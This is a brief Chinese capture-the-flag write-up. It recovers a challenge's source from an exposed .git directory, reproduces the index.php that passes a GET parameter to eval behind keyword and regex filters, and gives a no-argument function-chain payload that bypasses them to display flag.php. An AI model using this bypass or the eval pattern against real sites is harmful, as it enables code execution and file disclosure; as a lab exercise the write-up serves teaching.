找了一圈没有找到有用信息,用dirsearch发现有很多git目录,用githack下载到index.php和flag.php查看flag.php内容不完整,查看index.php
"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(__FILE__); ?>这里构造payload,用loacleconv返回一个.pos将.返回到payload让scandir能够读出当前目录下的文件,arry_reverse()以相反的顺序输出,再next提取下一个.,最后highlight显示
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));